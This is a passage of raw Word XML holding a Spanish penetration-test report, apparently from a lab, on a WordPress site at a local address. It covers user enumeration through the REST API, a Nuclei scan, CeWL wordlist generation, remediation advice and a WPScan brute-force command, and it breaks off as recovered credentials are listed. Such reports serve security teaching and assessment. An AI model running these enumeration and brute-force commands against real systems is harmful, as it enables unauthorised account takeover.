        <w:t>Enumeración de usuarios</w:t>
      </w:r>
      <w:r w:rsidRPr="00301B4F">
        <w:br/>
        <w:t xml:space="preserve">Mediante el </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t>endpoint</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t>: /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t>wp-json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t>wp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t>/v2/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t>users</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="605460CF" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:r w:rsidRPr="00301B4F">
        <w:t>Se pudieron identificar usuarios válidos del sistema:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2012C1F6" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00301B4F">
        <w:t>Administrador</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA7CF44" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00301B4F">
        <w:t>Roldan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C70F76" w14:textId="033F179A" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00391BA3" w:rsidP="00301B4F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="26792BCA" wp14:editId="1191AABF">
            <wp:extent cx="4676775" cy="2686050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FEB5" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Análisis automatizado con </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Nuclei</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00301B4F">
        <w:br/>
        <w:t xml:space="preserve">Posteriormente se utilizó la herramienta </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t>Nuclei</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t xml:space="preserve"> sobre la URL del sitio: http://192.168.0.27/wordpress/</w:t>
      </w:r>
      <w:r w:rsidRPr="00301B4F">
        <w:br/>
        <w:t>El análisis detectó múltiples indicadores de seguridad relevantes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33401B41" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Vulnerabilidades detectadas:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D625A9D" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00301B4F">
        <w:t xml:space="preserve">Exposición del panel de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t>login</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t xml:space="preserve"> de WordPress — MEDIA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013B1640" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00301B4F">
        <w:t>Enumeración de usuarios habilitada — MEDIA/ALTA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D1473A" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00301B4F">
        <w:t xml:space="preserve">Formulario de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t>login</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t xml:space="preserve"> accesible (posible fuerza bruta) — ALTA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A65BD4" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00301B4F">
        <w:t>WordPress versión 5.4.19 obsoleta — MEDIA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261DBE91" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00301B4F">
        <w:t>PHP 7.3.x obsoleto — MEDIA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E247F64" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00301B4F">
        <w:lastRenderedPageBreak/>
        <w:t>Exposición de archivos informativos (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t>readme</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t>directory</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t>listing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t>) — BAJA/INFORMATIVA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3937FA71" w14:textId="24673008" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00391BA3" w:rsidP="00301B4F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="25AA6D50" wp14:editId="163057B4">
            <wp:extent cx="5314950" cy="28575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9618" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Impacto de las vulnerabilidades</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="267DF6C7" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00301B4F">
        <w:t>Estas debilidades permiten:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="497104E3" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00301B4F">
        <w:t>Identificar usuarios válidos del sistema</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD55514" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00301B4F">
        <w:t xml:space="preserve">Realizar ataques de fuerza bruta sobre el panel de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t>login</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="062DA73A" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00301B4F">
        <w:t>Aprovechar versiones obsoletas con vulnerabilidades conocidas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20751013" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00301B4F">
        <w:t>Incrementar la superficie de ataque del servicio web</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F65EA0" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Recomendaciones generales</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17990308" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00301B4F">
        <w:t>Actualizar WordPress y PHP a versiones actuales y parcheadas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64161AC1" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00301B4F">
        <w:t xml:space="preserve">Deshabilitar o restringir la API REST de WordPress y </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t>wp-json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0D3794" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00301B4F">
        <w:t>Ocultar readme.html, license.txt y limitar el listado de directorios.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7919FDF5" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00301B4F">
        <w:t>Controlar y validar las redirecciones para evitar que se utilicen para ataques maliciosos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75308DFF" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00301B4F">
        <w:t xml:space="preserve">Reforzar el </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t>login</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t xml:space="preserve"> con bloqueo de intentos, captchas y autenticación de dos factores.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C4625A" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:r w:rsidRPr="00301B4F">
        <w:pict w14:anchorId="4E4774FE">
          <v:rect id="_x0000_i1028" style="width:0;height:.75pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="22FDF422" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CREACIÓN DE DICCIONARIO CON CEWL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="038B833D" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:r w:rsidRPr="00301B4F">
        <w:lastRenderedPageBreak/>
        <w:t>Se utilizó la herramienta CEWL con el objetivo de generar un diccionario personalizado a partir del contenido del sitio WordPress para su uso posterior en ataques de fuerza bruta sobre el panel de autenticación.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A366832" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Comando ejecutado:</w:t>
      </w:r>
      <w:r w:rsidRPr="00301B4F">
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t>cewl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t xml:space="preserve"> -e http://192.168.0.27/wordpress/ -m 4 -w </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t>prototipo_xd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="34480002" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Resultado: Se generó el diccionario </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>prototipo_xd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t> compuesto por palabras extraídas del contenido de la página web.</w:t>
      </w:r>
      <w:r w:rsidRPr="00301B4F">
        <w:br/>
        <w:t>Entre los términos obtenidos destacan:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49352F42" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00301B4F">
        <w:t>Roldan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1862CB59" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00301B4F">
        <w:t>Quesos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="211FDD0A" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00301B4F">
        <w:t>Manchego</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6F9BF4" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t>Quesosroldan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="34CFE669" w14:textId="3D42E89D" w:rsidR="00391BA3" w:rsidRPr="00301B4F" w:rsidRDefault="00391BA3" w:rsidP="00391BA3">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4AE2A700" wp14:editId="460D2C4F">
            <wp:extent cx="5400040" cy="25908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7665" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Análisis</w:t>
      </w:r>
      <w:r w:rsidRPr="00301B4F">
        <w:br/>
        <w:t>El diccionario generado contiene términos contextualizados al sitio objetivo lo que incrementa la eficacia de ataques de fuerza bruta frente a diccionarios genéricos. Este enfoque permite adaptar el ataque al entorno real del sistema objetivo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C15AE79" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Clasificación de la vulnerabilidad</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D33120" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00301B4F">
        <w:t>Tipo: Exposición de información útil para ataques de diccionario</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1068F3" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00301B4F">
        <w:t>Severidad: MEDIA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23970154" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00301B4F">
        <w:t>Impacto: Facilita ataques de fuerza bruta dirigidos contra el panel de autenticación</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731ABF31" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>RECOMENDACIONES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6425A62C" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00301B4F">
        <w:lastRenderedPageBreak/>
        <w:t>Limitar el acceso al panel de administración de WordPress mediante IP o red interna.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1364CB11" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00301B4F">
        <w:t>Ocultar o cambiar la URL de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t>wp-login.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t> para dificultar ataques automatizados.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CCEFFEE" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00301B4F">
        <w:t xml:space="preserve">Reforzar la seguridad del </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t>login</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t xml:space="preserve"> con bloqueos de intentos fallidos y autenticación de dos factores.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3CFC24" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:r w:rsidRPr="00301B4F">
        <w:pict w14:anchorId="266018E7">
          <v:rect id="_x0000_i1029" style="width:0;height:.75pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA1D123" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Explotación de WORDPRESS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE10050" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Ataque de fuerza bruta contra WordPress</w:t>
      </w:r>
      <w:r w:rsidRPr="00301B4F">
        <w:br/>
        <w:t xml:space="preserve">Se utilizó la herramienta </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t>WPScan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t xml:space="preserve"> para realizar un ataque de fuerza bruta sobre el panel de autenticación del sitio WordPress utilizando un diccionario personalizado generado previamente.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED5B350" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Comando ejecutado:</w:t>
      </w:r>
      <w:r w:rsidRPr="00301B4F">
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t>wpscan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t xml:space="preserve"> --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t xml:space="preserve"> http://192.168.0.27/wordpress/ --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t>usernames</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t>administrador,roldan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t xml:space="preserve"> --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t>passwords</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00301B4F">
        <w:t>prototipo_xd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="574CCB05" w14:textId="77777777" w:rsidR="00301B4F" w:rsidRPr="00301B4F" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Objetivo</w:t>
      </w:r>
      <w:r w:rsidRPr="00301B4F">
        <w:br/>
        <w:t>Obtener credenciales válidas de acceso al panel de administración mediante el ataque de diccionario.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0782FCB1" w14:textId="4724BFB5" w:rsidR="00391BA3" w:rsidRDefault="00301B4F" w:rsidP="00301B4F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Resultado</w:t>
      </w:r>
      <w:r w:rsidRPr="00301B4F">
        <w:br/>
        <w:t>El ataque fue exitoso, obtenidas las siguientes credenciales:</w:t>
      </w:r>
      <w:r w:rsidRPr="00301B4F">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Usuario: roldan</w:t>
      </w:r>
      <w:r w:rsidRPr="00301B4F">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00301B4F">
        <w:rPr>
          <w:b/>
